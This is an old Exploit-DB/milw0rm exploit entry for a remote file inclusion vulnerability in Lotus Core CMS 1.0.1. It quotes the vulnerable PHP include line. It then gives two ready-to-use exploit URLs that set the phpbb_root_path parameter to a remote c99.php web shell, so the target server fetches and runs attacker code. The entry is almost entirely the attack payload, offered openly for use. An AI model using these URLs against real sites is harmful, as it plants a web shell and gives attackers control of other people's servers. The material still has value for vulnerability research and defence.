Lotus Core CMS 1.0.1 - Remote File Inclusion
Author: Ciph3r
type: webapps
platform: php
port:
date_added: 2008-06-18
date_updated: 2016-12-09
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comv1.0.1.zip
###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
#
################################################################
#
# C0de :
#
#
# include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#
#
###############################################################
EXPLOIT :
http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?
#####################################################################
# milw0rm.com [2008-06-19]